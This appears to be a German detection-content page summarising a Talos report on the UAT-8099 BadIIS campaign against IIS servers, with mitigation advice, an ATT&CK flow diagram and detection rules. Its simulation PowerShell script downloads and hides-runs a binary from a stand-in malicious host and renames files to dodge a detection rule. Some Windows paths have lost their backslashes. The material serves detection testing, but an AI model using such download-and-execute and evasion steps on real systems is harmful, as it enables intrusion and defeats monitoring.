Untersuchung von UAT-8099: Neue Persistenzmechanismen und regionale Fokussierung
Folgen
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Cisco Talos berichtet über eine neue UAT-8099-Kampagne, die auf verwundbare IIS-Webserver in Asien abzielt. Der Akteur setzt angepasste BadIIS-Varianten ein, die regionale Kennungen enthalten, und verlässt sich auf Webshells, PowerShell und das Fernsteuerungs-Tool GotoHTTP für die nachfolgende Steuerung. Die Persistenz wurde erweitert, um die Erstellung versteckter lokaler Konten und die Verwendung legitimer Red-Team-Utilities einzuschließen, um sich in administrative Aktivitäten einzufügen. Diese Fähigkeiten überschneiden sich mit der früheren WEBJACK-Operation und scheinen sich auf SEO-Betrug zu konzentrieren, der Websites in Thailand und Vietnam betrifft.
Untersuchung
Talos überprüfte DNS-Telemetrie, Dateihashes und bösartige Skripte, um die Angriffskette zu rekonstruieren. Analysten stellten fest, dass Webshells mit Tools wie SoftEther VPN und EasyTier sowie einem Satz maßgeschneiderter Utilities, darunter Sharp4RemoveLog, CnCrypt Protect, OpenArk64 und GotoHTTP, kombiniert wurden. Zwei auf die Region abgestimmte BadIIS-Varianten—IISHijack und asdSearchEngine—wurden rückentwickelt, was fest codierte Ländercodes, selektives Anforderungsfiltern und XOR-verschlüsselte C2-Konfigurationen aufdeckte. Auch auf VirusTotal wurde ein ELF-Build von BadIIS mit passenden C2-Domains identifiziert.
Minderung
Patchen Sie exponierte IIS-Schwachstellen, verstärken Sie die Durchsetzung der Web Application Firewall und überwachen Sie die Erstellung versteckter lokaler Konten (zum Beispiel admin$, mysql$ und ähnliche). Erkennen Sie PowerShell-Aktivitäten, die GotoHTTP herunterladen oder starten und blocken Sie die ausgehende Kommunikation zu bekannten C2-Domains. Verwenden Sie Endpunktkontrollen, um auf die Ausführung der identifizierten benutzerdefinierten Utilities und auf unerwartete Änderungen in Webserververzeichnissen zu alarmieren.
Reaktion
Wenn Indikatoren gefunden werden, isolieren Sie den Server, entfernen Sie Webshells und löschen Sie versteckte Konten. Bewahren Sie BadIIS-Binärdateien und verwandte Skripte für die forensische Analyse auf und führen Sie eine vollständige Überprüfung des Netzwerkverkehrs durch, um C2-Aktivitäten zu identifizieren. Stellen Sie von einem bekannten, guten Backup wieder her und härten Sie die IIS-Konfiguration erneut, um eine erneute Infektion zu verhindern.
graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ffcc99 %% Node definitions action_exploit_public_facing[„<b>Aktion</b> – <b>T1190 Ausnutzung öffentlich erreichbarer Anwendungen</b><br/><b>Beschreibung</b>: Nutzt Schwachstellen in internetseitig erreichbaren Anwendungen aus, um initialen Zugriff zu erlangen.<br/><b>Details</b>: Kompromittierte IIS-Server über bekannte Schwachstellen und installierte Web-Shells.“] class action_exploit_public_facing action tool_web_shell[„<b>Werkzeug</b> – <b>Name</b>: Web Shell<br/><b>Beschreibung</b>: Serverseitiges Skript zur entfernten Befehlsausführung.“] class tool_web_shell tool action_powershell_execution[„<b>Aktion</b> – <b>T1059.001 PowerShell</b><br/><b>Beschreibung</b>: Verwendung von PowerShell zur Ausführung von Befehlen und Payloads.<br/><b>Befehle</b>: whoami, tasklist, Download von Werkzeugen.“] class action_powershell_execution action tool_powershell[„<b>Werkzeug</b> – <b>Name</b>: PowerShell<br/><b>Beschreibung</b>: Windows-Befehlszeilenshell und Skriptsprache.“] class tool_powershell tool action_system_info_discovery[„<b>Aktion</b> – <b>T1082 Systeminformationsaufklärung</b><br/><b>Beschreibung</b>: Erfasst Betriebssystem- und Hardwarekonfiguration.<br/><b>Befehle</b>: Sammlung von Systeminformationen, Protokollierung des Benutzerkontexts.“] class action_system_info_discovery action action_create_account[„<b>Aktion</b> – <b>T1136 Konto erstellen</b><br/><b>Beschreibung</b>: Erstellt versteckte lokale Konten zur Persistenz.“] class action_create_account action action_valid_accounts[„<b>Aktion</b> – <b>T1078 Gültige Konten</b><br/><b>Beschreibung</b>: Nutzung erstellter Konten für dauerhaften Zugriff und Privilegieneskalation.“] class action_valid_accounts action action_clear_event_logs[„<b>Aktion</b> – <b>T1070.001 Löschen von Windows-Ereignisprotokollen</b><br/><b>Beschreibung</b>: Entfernt Protokolle zur Verschleierung der Aktivitäten.<br/><b>Werkzeug</b>: Sharp4RemoveLog.“] class action_clear_event_logs action tool_sharp4removelog[„<b>Werkzeug</b> – <b>Name</b>: Sharp4RemoveLog<br/><b>Beschreibung</b>: Dienstprogramm zum Löschen von Windows-Ereignisprotokollen.“] class tool_sharp4removelog tool action_disable_event_logging[„<b>Aktion</b> – <b>T1562.002 Deaktivieren der Windows-Ereignisprotokollierung</b><br/><b>Beschreibung</b>: Beeinträchtigt Verteidigungsmaßnahmen durch Abschalten der Protokollierung.“] class action_disable_event_logging action action_obfuscate_files[„<b>Aktion</b> – <b>T1027 Verschleierte Dateien oder Informationen</b><br/><b>Beschreibung</b>: Verwendung von XOR-Verschlüsselung (Schlüssel 0x7A) zur Verbergung der C2-Konfiguration und HTML-Vorlagen.“] class action_obfuscate_files action malware_badiis[„<b>Schadsoftware</b> – <b>Name</b>: BadIIS<br/><b>Beschreibung</b>: Varianten mit XOR-Verschleierung.“] class malware_badiis malware action_lateral_tool_transfer[„<b>Aktion</b> – <b>T1570 Lateraler Werkzeugtransfer</b><br/><b>Beschreibung</b>: Überträgt Werkzeuge und Dateien innerhalb der Zielumgebung.<br/><b>Werkzeuge</b>: BadIIS-Binärdateien, GotoHTTP, SoftEther VPN, EasyTier.“] class action_lateral_tool_transfer action tool_gotohttp[„<b>Werkzeug</b> – <b>Name</b>: GotoHTTP<br/><b>Beschreibung</b>: Überträgt Dateien über HTTP/HTTPS.“] class tool_gotohttp tool tool_softether[„<b>Werkzeug</b> – <b>Name</b>: SoftEther VPN<br/><b>Beschreibung</b>: Mehrstufiger Proxy zum Tunneln von Datenverkehr.“] class tool_softether tool tool_easytier[„<b>Werkzeug</b> – <b>Name</b>: EasyTier<br/><b>Beschreibung</b>: Mehrstufiger Proxy zum Tunneln von Datenverkehr.“] class tool_easytier tool action_proxy_multi_hop[„<b>Aktion</b> – <b>T1090.003 Mehrstufiger Proxy</b><br/><b>Beschreibung</b>: Nutzung von Proxy-Werkzeugen zur Verschleierung der Herkunft des Datenverkehrs.“] class action_proxy_multi_hop action action_web_protocol_c2[„<b>Aktion</b> – <b>T1071.001 Webprotokolle</b><br/><b>Beschreibung</b>: C2-Kommunikation über HTTP/HTTPS unter Verwendung von GotoHTTP.“] class action_web_protocol_c2 action %% Connections showing flow action_exploit_public_facing –>|verwendet| tool_web_shell tool_web_shell –>|ermöglicht| action_powershell_execution action_powershell_execution –>|verwendet| tool_powershell tool_powershell –>|führt aus| action_system_info_discovery action_system_info_discovery –>|führt zu| action_create_account action_create_account –>|ermöglicht| action_valid_accounts action_valid_accounts –>|verwendet| action_clear_event_logs action_clear_event_logs –>|verwendet| tool_sharp4removelog action_clear_event_logs –>|auch| action_disable_event_logging action_disable_event_logging –>|geht voraus| action_obfuscate_files action_obfuscate_files –>|implementiert durch| malware_badiis malware_badiis –>|ermöglicht| action_lateral_tool_transfer action_lateral_tool_transfer –>|überträgt| tool_gotohttp action_lateral_tool_transfer –>|überträgt| tool_softether action_lateral_tool_transfer –>|überträgt| tool_easytier tool_softether –>|verwendet für| action_proxy_multi_hop tool_easytier –>|verwendet für| action_proxy_multi_hop action_proxy_multi_hop –>|unterstützt| action_web_protocol_c2 tool_gotohttp –>|verwendet in| action_web_protocol_c2
Angriffsfluss
Erkennungen
Download oder Upload über Powershell (via cmdline)
Ansehen
Verdächtige Dateien im öffentlichen Benutzerprofil (via file_event)
Ansehen
Mögliche Konto- oder Gruppenaufzählung (via cmdline)
Ansehen
Erkennen von PowerShell-Befehlsausführungen für die GotoHTTP-Bereitstellung [Windows PowerShell]
Ansehen
Erkennung von BadIIS-Malware, die IIS-Server für SEO-Betrug angreift [Webserver]
Ansehen
Simulation Ausführung
Voraussetzung: Der Telemetrie- und Baseline-Pre-Flight-Check muss bestanden sein.
-
Angriffserzählung & Befehle:
Ein Angreifer hat sich initialen Zugang zu einem kompromittierten Webserver verschafft. Sie erstellen ein verstecktes Verzeichnis namensbad_iisunter dem IIS-Webstamm und legen eine benutzerdefiniert benannte Web-Shell-Binärdatei abshell_xyz.exe(um den literal string „Webshell“ zu vermeiden). Mit der Shell führen sie seitlich ein PowerShell-Payload aus, das die GotoHTTP-Binärdatei herunterlädt, diese insvc_update.exeumbenennt und ausführt. Da die Bildnamen obfuskiert sind, umgeht dies den ursprünglichen Regel-Image|containsprüfungen, während das Kommandozeilenargument immer noch „PowerShell“ enthält. -
Regression Test-Skript: Dieses Skript reproduziert die beschriebenen Schritte und erzeugt Telemetrie ähnlich wie bei dem BadIIS-Angriff ohne die genauen Strings zu verwenden, auf die die Regel achtet.
# BadIIS simulation – obfuscated version $webRoot = "C:inetpubwwwroot" $payloadDir = Join-Path $webRoot "bad_iis" New-Item -Path $payloadDir -ItemType Directory -Force | Out-Null # Deploy a renamed web‑shell (binary copy of a known benign exe) $shellSrc = "$env:SystemRootSystem32notepad.exe" $shellDst = Join-Path $payloadDir "shell_xyz.exe" Copy-Item -Path $shellSrc -Destination $shellDst -Force # Simulate the web‑shell invoking PowerShell to download GotoHTTP $gotoUrl = "http://malicious.example.com/GotoHTTP.exe" $gotoDst = "C:WindowsTempsvc_update.exe" $psCommand = @" Invoke-WebRequest -Uri '$gotoUrl' -OutFile '$gotoDst'; Start-Process -FilePath '$gotoDst' -WindowStyle Hidden; "@ # Execute the PowerShell payload via the renamed web‑shell (process creation) Start-Process -FilePath $shellDst -ArgumentList "/c powershell.exe -NoProfile -ExecutionPolicy Bypass -Command `$psCommand`" -WindowStyle Hidden Write-Output "BadIIS simulation executed." -
Bereinigung Befehle: Entfernt die platzierten Artefakte und stellt die Umgebung wieder her.
# Cleanup BadIIS simulation artifacts $webRoot = "C:inetpubwwwroot" $payloadDir = Join-Path $webRoot "bad_iis" Remove-Item -Path $payloadDir -Recurse -Force -ErrorAction SilentlyContinue $gotoDst = "C:WindowsTempsvc_update.exe" Remove-Item -Path $gotoDst -Force -ErrorAction SilentlyContinue Write-Output "Cleanup completed."